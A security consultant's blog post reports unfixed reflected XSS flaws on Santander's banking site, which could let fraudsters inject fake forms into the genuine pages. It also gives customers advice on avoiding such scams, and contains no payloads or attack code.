Paul Moore

I.T Security Consultant


Santander aren't secure - Should we bank online?

"Your financial protection is our priority and we take this very seriously" "Our service actively protects both your identity and your finances." "We take every step possible to keep your finances and personal details safe."

Confident statements; so you'd be forgiven for having equal confidence in their abilities to protect your information.

In November 2011, I contacted Santander to alert them to several security concerns which needed to be addressed.

Take the "online security" page for example.  It should look like this...

Unfortunately, the abundance of XSS (Cross Site Scripting) flaws throughout the site allow this...

Everything you see in red is fake... inserted from a remote site designed to collect user information.

Isn't this just another phishing scam?

This isn't a phishing scam at all, though fraudsters leverage aspects of a traditional phishing scam to profit from this type of exploit.  Traditional phishing scams consist of two things...

  1.  A fake email.
  2.  A fake website.

With anti-fraud software (Santander recommend Rapport) becoming more prevalent, phishing scams which rely on fake websites are harder to pull off.  This exploit allows us to modify the genuine site, making it much harder to spot as fraudulent.

Rapport for example, says everything is fine.

To be fair, Rapport was never designed to detect this kind of fraud...it just presumes (as we would) that the real site is 'secure'.

So, 10 months have passed (along with numerous emails back and forth with Santander's eCommerce security team) and it seems they're unable to fix this issue.

How can I protect myself from this type of scam?

Luckily, this exploit (known as "reflected xss") still requires you to click a link containing a malicious payload... so avoid links in emails, twitter feeds & facebook posts which relate to a bank.  Always type the address you require directly in to your browser's address bar.

Keep your anti-virus/anti-malware up to date.  Most applications look after their own updates, some do not.  Check it now!

Ironically, fake information can be used to reveal & defeat this type of scam.  A genuine site will be able to validate the information you provide, alerting you to any errors.  A fake site must presume your information is correct.  If you're still unsure - enter complete rubbish and see if the forms submits.  If it does, chances are it's fake.

Don't forget to share this article!

comments powered by Disqus